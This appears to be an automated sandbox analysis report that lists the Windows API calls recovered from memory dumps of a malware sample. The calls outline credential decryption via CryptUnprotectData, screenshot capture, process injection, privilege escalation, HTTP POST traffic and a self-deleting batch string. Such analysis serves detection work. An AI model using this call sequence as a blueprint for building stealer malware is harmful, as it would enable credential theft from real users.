Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C35B10: CloseHandle.KERNEL32 ref: 00C35B20
Part of subcall function 00C35B10: DeleteCriticalSection.KERNEL32(?,?,00000000,00C44EB9,?,?,00000001), ref: 00C35B37

Part of subcall function 00C2CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C2CEB9

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD338D, Relevance: 20.3, APIs: 7, Strings: 3, Instructions: 143

APIs

GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00FD33AB
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00FD33B6
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00FD33C1

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

lstrcmpiW.KERNEL32(?), ref: 00FD344E
memcpy.MSVCRT ref: 00FD3471

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00FD349C
memcpy.MSVCRT ref: 00FD34CA

Strings

GdipGetImageEncodersSize, xrefs: 00FD339C
GdipGetImageEncoders, xrefs: 00FD33AD
GdipSaveImageToStream, xrefs: 00FD33B8

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3338D, Relevance: 20.3, APIs: 7, Strings: 3, Instructions: 143

APIs

GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00C333AB
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00C333B6
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00C333C1

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

lstrcmpiW.KERNEL32(?), ref: 00C3344E
memcpy.MSVCRT ref: 00C33471

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C3349C
memcpy.MSVCRT ref: 00C334CA

Strings

GdipGetImageEncodersSize, xrefs: 00C3339C
GdipGetImageEncoders, xrefs: 00C333AD
GdipSaveImageToStream, xrefs: 00C333B8

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEB33E, Relevance: 20.3, APIs: 8, Strings: 2, Instructions: 107

APIs

memcpy.MSVCRT ref: 00FEB364
CreateFileMappingW.KERNEL32(000000FF,?,08000004,00000000,00001000,00000000), ref: 00FEB385
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00001000), ref: 00FEB39D

Part of subcall function 00FEAF22: UnmapViewOfFile.KERNEL32 ref: 00FEAF2E
Part of subcall function 00FEAF22: CloseHandle.KERNEL32 ref: 00FEAF3F

memset.MSVCRT ref: 00FEB3F2
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00FEB42B

Part of subcall function 00FEAF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00FFF128), ref: 00FEAF7C
Part of subcall function 00FEAF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00FEAF9C
Part of subcall function 00FEAF4A: memset.MSVCRT ref: 00FEB039
Part of subcall function 00FEAF4A: memcpy.MSVCRT ref: 00FEB04B

ResumeThread.KERNEL32(?), ref: 00FEB44E
CloseHandle.KERNEL32(?), ref: 00FEB465
CloseHandle.KERNEL32(?), ref: 00FEB46B

Strings

-m%p, xrefs: 00FEB3CD
D, xrefs: 00FEB423

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4B33E, Relevance: 20.3, APIs: 8, Strings: 2, Instructions: 107

APIs

memcpy.MSVCRT ref: 00C4B364
CreateFileMappingW.KERNEL32(000000FF,?,08000004,00000000,00001000,00000000), ref: 00C4B385
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00001000), ref: 00C4B39D

Part of subcall function 00C4AF22: UnmapViewOfFile.KERNEL32 ref: 00C4AF2E
Part of subcall function 00C4AF22: CloseHandle.KERNEL32 ref: 00C4AF3F

memset.MSVCRT ref: 00C4B3F2
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00C4B42B

Part of subcall function 00C4AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00C5F128), ref: 00C4AF7C
Part of subcall function 00C4AF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00C4AF9C
Part of subcall function 00C4AF4A: memset.MSVCRT ref: 00C4B039
Part of subcall function 00C4AF4A: memcpy.MSVCRT ref: 00C4B04B

ResumeThread.KERNEL32(?), ref: 00C4B44E
CloseHandle.KERNEL32(?), ref: 00C4B465
CloseHandle.KERNEL32(?), ref: 00C4B46B

Strings

-m%p, xrefs: 00C4B3CD
D, xrefs: 00C4B423

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C350C0, Relevance: 18.5, APIs: 8, Strings: 1, Instructions: 60

APIs

GetCurrentThread.KERNEL32 ref: 00C350D4
OpenThreadToken.ADVAPI32 ref: 00C350DB
GetCurrentProcess.KERNEL32 ref: 00C350EB
OpenProcessToken.ADVAPI32 ref: 00C350F2
LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00C35113
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00C35128
GetLastError.KERNEL32 ref: 00C35132
CloseHandle.KERNEL32(00000001), ref: 00C35143

Strings

SeTcbPrivilege, xrefs: 00C35106

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE0A9A, Relevance: 18.4, APIs: 8, Strings: 1, Instructions: 182

APIs

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE0AD8
PathRemoveFileSpecW.SHLWAPI(?), ref: 00FE0B26

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

FindFirstFileW.KERNEL32(?,?), ref: 00FE0B93
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00FE0BEA
FindClose.KERNEL32 ref: 00FE0CF3

Part of subcall function 00FCE4C3: GetFileSizeEx.KERNEL32(?,?), ref: 00FCE4CE

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

SetLastError.KERNEL32(00000057,?), ref: 00FE0C5B

Part of subcall function 00FCE543: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00FCE555

CloseHandle.KERNEL32 ref: 00FE0C95

Part of subcall function 00FCE348: CloseHandle.KERNEL32 ref: 00FCE354

FindNextFileW.KERNEL32(?,?), ref: 00FE0CC9

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
Part of subcall function 00FCE826: DeleteFileW.KERNEL32(?), ref: 00FCE836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00FE0AFA

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C40A9A, Relevance: 18.4, APIs: 8, Strings: 1, Instructions: 182

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C40AD8
PathRemoveFileSpecW.SHLWAPI(?), ref: 00C40B26

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

FindFirstFileW.KERNEL32(?,?), ref: 00C40B93
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00C40BEA
FindClose.KERNEL32 ref: 00C40CF3

Part of subcall function 00C2E4C3: GetFileSizeEx.KERNEL32(?,?), ref: 00C2E4CE

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

SetLastError.KERNEL32(00000057,?), ref: 00C40C5B

Part of subcall function 00C2E543: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C2E555

CloseHandle.KERNEL32 ref: 00C40C95

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

FindNextFileW.KERNEL32(?,?), ref: 00C40CC9

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C40AFA

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCADFB, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184

APIs

GetLogicalDrives.KERNEL32 ref: 00FCAE0F

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

SHGetFolderPathW.SHELL32(00000000,00006024,00000000,00000000,?), ref: 00FCAE54
PathGetDriveNumberW.SHLWAPI(?), ref: 00FCAE66
lstrcpyW.KERNEL32(?,00FC75B0), ref: 00FCAE7A
GetDriveTypeW.KERNEL32(?), ref: 00FCAEE3
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000105), ref: 00FCAF44
CharUpperW.USER32(?), ref: 00FCAF60
lstrcmpW.KERNEL32(?), ref: 00FCAF83
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 00FCAFC1

Strings

#, xrefs: 00FCAE9E

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2ADFB, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184

APIs

GetLogicalDrives.KERNEL32 ref: 00C2AE0F

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

SHGetFolderPathW.SHELL32(00000000,00006024,00000000,00000000,?), ref: 00C2AE54
PathGetDriveNumberW.SHLWAPI(?), ref: 00C2AE66
lstrcpyW.KERNEL32(?,00C275B0), ref: 00C2AE7A
GetDriveTypeW.KERNEL32(?), ref: 00C2AEE3
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000105), ref: 00C2AF44
CharUpperW.USER32(?), ref: 00C2AF60
lstrcmpW.KERNEL32(?), ref: 00C2AF83
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 00C2AFC1

Strings

#, xrefs: 00C2AE9E

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C39777, Relevance: 16.5, APIs: 6, Strings: 2, Instructions: 135

APIs

Part of subcall function 00C4B07B: memset.MSVCRT ref: 00C4B0A7

Part of subcall function 00C4B70A: NlsGetCacheUpdateCount.KERNEL32(?,00000000), ref: 00C4B783
Part of subcall function 00C4B70A: SetFileAttributesW.KERNEL32(?), ref: 00C4B7A2
Part of subcall function 00C4B70A: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00C4B7B9
Part of subcall function 00C4B70A: GetLastError.KERNEL32(?,00000002,?,?), ref: 00C4B7C6
Part of subcall function 00C4B70A: CloseHandle.KERNEL32 ref: 00C4B7FF

Part of subcall function 00C506B6: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000104,00000000,?,00000000), ref: 00C506D4
Part of subcall function 00C506B6: RegCreateKeyExW.ADVAPI32(?,00C39821,00000000,00000000,00000000,00000103,00000000,?,?), ref: 00C50709
Part of subcall function 00C506B6: RegCloseKey.ADVAPI32(?), ref: 00C50718
Part of subcall function 00C506B6: RegCloseKey.ADVAPI32(?), ref: 00C50733

lstrlenW.KERNEL32(C:\Documents and Settings\Administrator\Application Data), ref: 00C39832

Part of subcall function 00C29F94: memset.MSVCRT ref: 00C29FA8

Part of subcall function 00C2A353: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,00000014,00000000,00000000), ref: 00C2A379
Part of subcall function 00C2A353: memcpy.MSVCRT ref: 00C2A39E

Part of subcall function 00C2A427: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,00000014,00000000,00000000), ref: 00C2A44A

Part of subcall function 00C3BD8C: memset.MSVCRT ref: 00C3BE17

Part of subcall function 00C37058: GetFileSizeEx.KERNEL32(00000000,?), ref: 00C3708F
Part of subcall function 00C37058: SetEndOfFile.KERNEL32 ref: 00C37105
Part of subcall function 00C37058: FlushFileBuffers.KERNEL32(?), ref: 00C37110

CloseHandle.KERNEL32 ref: 00C3989F
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C398AD

Part of subcall function 00C2E6AF: GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00C2E6BC
Part of subcall function 00C2E6AF: CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00C2E6DC

lstrcpyW.KERNEL32(?,?), ref: 00C398FD

Part of subcall function 00C4B9D8: PathIsDirectoryW.SHLWAPI(?), ref: 00C4BA0E
Part of subcall function 00C4B9D8: CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00C4BA30
Part of subcall function 00C4B9D8: GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00C4BA76
Part of subcall function 00C4B9D8: CloseHandle.KERNEL32 ref: 00C4BA95
Part of subcall function 00C4B9D8: PathRemoveFileSpecW.SHLWAPI ref: 00C4BAA2

memcpy.MSVCRT ref: 00C398E8
CloseHandle.KERNEL32 ref: 00C39916

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C397BE 00C39831 00C398B3
.exe, xrefs: 00C397E7

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDF23B, Relevance: 16.5, APIs: 9, Instructions: 176

APIs

lstrlenW.KERNEL32 ref: 00FDF31C

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00FDF389

Part of subcall function 00FF3D5A: memcpy.MSVCRT ref: 00FF3D94

LocalFree.KERNEL32(?), ref: 00FDF3A7
lstrlenW.KERNEL32(?), ref: 00FDF410

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

#6.OLEAUT32 ref: 00FDF432
#6.OLEAUT32(?), ref: 00FDF438
#6.OLEAUT32 ref: 00FDF43B
#6.OLEAUT32(?), ref: 00FDF441
#6.OLEAUT32 ref: 00FDF444

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3F23B, Relevance: 16.5, APIs: 9, Instructions: 176

APIs

lstrlenW.KERNEL32 ref: 00C3F31C

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00C3F389

Part of subcall function 00C53D5A: memcpy.MSVCRT ref: 00C53D94

LocalFree.KERNEL32(?), ref: 00C3F3A7
lstrlenW.KERNEL32(?), ref: 00C3F410

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

#6.OLEAUT32 ref: 00C3F432
#6.OLEAUT32(?), ref: 00C3F438
#6.OLEAUT32 ref: 00C3F43B
#6.OLEAUT32(?), ref: 00C3F441
#6.OLEAUT32 ref: 00C3F444

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE08C0, Relevance: 16.3, APIs: 7, Strings: 1, Instructions: 146

APIs

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

Part of subcall function 00FD6A7D: memcpy.MSVCRT ref: 00FD6A9C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE0934
PathRemoveFileSpecW.SHLWAPI(?), ref: 00FE0982
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00FE09F8
GetLastError.KERNEL32(?,?,?,00000000,3D94878D), ref: 00FE0A05
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FE0A2F
FlushFileBuffers.KERNEL32 ref: 00FE0A49
CloseHandle.KERNEL32 ref: 00FE0A50

Part of subcall function 00FCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
Part of subcall function 00FCE826: DeleteFileW.KERNEL32(?), ref: 00FCE836

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00FE0956

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C408C0, Relevance: 16.3, APIs: 7, Strings: 1, Instructions: 146

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

Part of subcall function 00C36A7D: memcpy.MSVCRT ref: 00C36A9C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C40934
PathRemoveFileSpecW.SHLWAPI(?), ref: 00C40982
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00C409F8
GetLastError.KERNEL32(?,?,?,00000000,3D94878D), ref: 00C40A05
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C40A2F
FlushFileBuffers.KERNEL32 ref: 00C40A49
CloseHandle.KERNEL32 ref: 00C40A50

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C40956

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD8F66, Relevance: 16.3, APIs: 3, Strings: 5, Instructions: 75

APIs

Part of subcall function 00FD8E45: InternetCloseHandle.WININET ref: 00FD8E57

HttpOpenRequestA.WININET(?,?,?,HTTP/1.1,00000000,00FC7BD8,?,00000000), ref: 00FD8FA7
HttpAddRequestHeadersA.WININET(?,Connection: Close,00000013,A0000000), ref: 00FD8FCA
HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 00FD900C

Strings

HTTP/1.1, xrefs: 00FD8F8E
GET, xrefs: 00FD8F96
POST, xrefs: 00FD8F9B
Connection: Close, xrefs: 00FD8FC4
(, xrefs: 00FD9005

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C38F66, Relevance: 16.3, APIs: 3, Strings: 5, Instructions: 75

APIs

Part of subcall function 00C38E45: InternetCloseHandle.WININET ref: 00C38E57

HttpOpenRequestA.WININET(?,?,?,HTTP/1.1,00000000,00C27BD8,?,00000000), ref: 00C38FA7
HttpAddRequestHeadersA.WININET(?,Connection: Close,00000013,A0000000), ref: 00C38FCA
HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 00C3900C

Strings

HTTP/1.1, xrefs: 00C38F8E
GET, xrefs: 00C38F96
POST, xrefs: 00C38F9B
Connection: Close, xrefs: 00C38FC4
(, xrefs: 00C39005

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C54181, Relevance: 16.2, APIs: 9, Instructions: 128

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C541A1
Process32FirstW.KERNEL32(?,?), ref: 00C541C6

Part of subcall function 00C4BE5A: CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4BEA0
Part of subcall function 00C4BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00C4BEAC
Part of subcall function 00C4BE5A: CloseHandle.KERNEL32 ref: 00C4BEBA

OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C5421D
CloseHandle.KERNEL32(?), ref: 00C542E7

Part of subcall function 00C3500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00C35020
Part of subcall function 00C3500E: GetTokenInformation.ADVAPI32(?,0000000C,00C62968,00000004,?), ref: 00C35048
Part of subcall function 00C3500E: CloseHandle.KERNEL32(?), ref: 00C3505E

CloseHandle.KERNEL32 ref: 00C5423B
GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00C54257
memcmp.MSVCRT ref: 00C5426F

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

Part of subcall function 00C540CB: OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00C540DC
Part of subcall function 00C540CB: CreateThread.KERNEL32(00000000,00000000,00C540AB,?), ref: 00C54132
Part of subcall function 00C540CB: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5413D
Part of subcall function 00C540CB: CloseHandle.KERNEL32 ref: 00C54144
Part of subcall function 00C540CB: WaitForSingleObject.KERNEL32(?,00002710), ref: 00C54154
Part of subcall function 00C540CB: CloseHandle.KERNEL32(?), ref: 00C5415B
Part of subcall function 00C540CB: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C5416C
Part of subcall function 00C540CB: CloseHandle.KERNEL32 ref: 00C54173

Process32NextW.KERNEL32(?,?), ref: 00C542F3
CloseHandle.KERNEL32 ref: 00C54306

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C307D0, Relevance: 16.1, APIs: 9, Instructions: 156

APIs

GetCurrentThreadId.KERNEL32 ref: 00C307D6
memcpy.MSVCRT ref: 00C30822
memset.MSVCRT ref: 00C3085A
GetThreadContext.KERNEL32(?,?), ref: 00C30895
SetThreadContext.KERNEL32(?,?), ref: 00C30900
GetCurrentProcess.KERNEL32 ref: 00C30919
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00C3093E
FlushInstructionCache.KERNEL32(?,?,0000007C), ref: 00C30950

Part of subcall function 00C30643: memset.MSVCRT ref: 00C30654

Part of subcall function 00C303FD: GetCurrentProcess.KERNEL32 ref: 00C30400
Part of subcall function 00C303FD: VirtualProtect.KERNEL32(00000000,00010000,00000020,?), ref: 00C30421
Part of subcall function 00C303FD: FlushInstructionCache.KERNEL32(?,00000000,00010000), ref: 00C3042A

ResumeThread.KERNEL32(?), ref: 00C30992

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C3072F: GetCurrentThreadId.KERNEL32 ref: 00C30730
Part of subcall function 00C3072F: VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00C30767
Part of subcall function 00C3072F: ResumeThread.KERNEL32(?), ref: 00C307A8

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCB74D, Relevance: 16.0, APIs: 9, Instructions: 112

APIs

GetProcAddress.KERNEL32(?,?), ref: 00FCB76F
GetProcAddress.KERNEL32(?,?), ref: 00FCB791
GetProcAddress.KERNEL32(?,?), ref: 00FCB7AC
GetProcAddress.KERNEL32(?,?), ref: 00FCB7C7
GetProcAddress.KERNEL32(?,?), ref: 00FCB7E2
GetProcAddress.KERNEL32(?,?), ref: 00FCB7FD
GetProcAddress.KERNEL32(?,?), ref: 00FCB81C
GetProcAddress.KERNEL32(?,?), ref: 00FCB83B
GetProcAddress.KERNEL32(?,?), ref: 00FCB85A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2B74D, Relevance: 16.0, APIs: 9, Instructions: 112

APIs

GetProcAddress.KERNEL32(?,?), ref: 00C2B76F
GetProcAddress.KERNEL32(?,?), ref: 00C2B791
GetProcAddress.KERNEL32(?,?), ref: 00C2B7AC
GetProcAddress.KERNEL32(?,?), ref: 00C2B7C7
GetProcAddress.KERNEL32(?,?), ref: 00C2B7E2
GetProcAddress.KERNEL32(?,?), ref: 00C2B7FD
GetProcAddress.KERNEL32(?,?), ref: 00C2B81C
GetProcAddress.KERNEL32(?,?), ref: 00C2B83B
GetProcAddress.KERNEL32(?,?), ref: 00C2B85A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEB0C1, Relevance: 16.0, APIs: 9, Instructions: 103

APIs

GetCommandLineW.KERNEL32 ref: 00FEB0DB
CommandLineToArgvW.SHELL32 ref: 00FEB0E2
StrCmpNW.SHLWAPI(?,00FC7F1C,00000002), ref: 00FEB108
LocalFree.KERNEL32 ref: 00FEB134

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00FEB171
memcpy.MSVCRT ref: 00FEB184

Part of subcall function 00FEF8BA: memcpy.MSVCRT ref: 00FEF8E7

UnmapViewOfFile.KERNEL32 ref: 00FEB1BD
CloseHandle.KERNEL32 ref: 00FEB1F9

Part of subcall function 00FEB562: memset.MSVCRT ref: 00FEB587
Part of subcall function 00FEB562: memcpy.MSVCRT ref: 00FEB5E7
Part of subcall function 00FEB562: memcpy.MSVCRT ref: 00FEB5FF
Part of subcall function 00FEB562: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00FEB66A
Part of subcall function 00FEB562: memcpy.MSVCRT ref: 00FEB6A8

memcpy.MSVCRT ref: 00FEB1E0

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

